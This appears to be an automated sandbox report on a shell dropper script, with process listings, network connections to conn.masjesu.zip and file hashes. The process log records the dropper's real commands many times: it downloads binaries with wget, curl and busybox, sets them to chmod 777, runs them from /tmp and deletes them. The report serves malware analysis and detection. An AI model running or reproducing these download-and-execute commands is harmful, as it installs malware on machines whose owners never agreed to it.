/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/chmod

[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M

[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/rm

[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/chmod

[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm

[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/rm

[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/chmod

[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an

[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/rm

[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/chmod

[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ

[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/rm

[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/chmod

[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh

[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/rm

[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/chmod

[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC

[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/rm

[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/chmod

[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2

[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/rm

[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/chmod

[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q

[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/rm

[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/chmod

[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB

[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/rm

[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/chmod

[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a

[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/rm

[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/chmod

[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ

[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/rm

[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/chmod

[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo

[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/rm

[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/chmod

[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R

[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/rm

[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/chmod

[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ

[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/bin/rm

[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/chmod

[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh

[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/bin/rm

[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/chmod

[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC

[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/bin/rm

[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/chmod

[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2

[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/bin/rm

[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/chmod

[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q

[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/bin/rm

[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/chmod

[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB

[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/bin/rm

[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/chmod

[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a

[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/bin/rm

[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/chmod

[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ

[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/bin/rm

[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/chmod

[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo

[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/bin/rm

[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/chmod

[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R

[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/bin/rm

[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/chmod

[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5

[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/bin/rm

[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/chmod

[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M

[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/bin/rm

[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/chmod

[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm

[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/bin/rm

[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/chmod

[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an

[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

/bin/rm

[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 01:27

Reported

2024-11-24 01:29

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
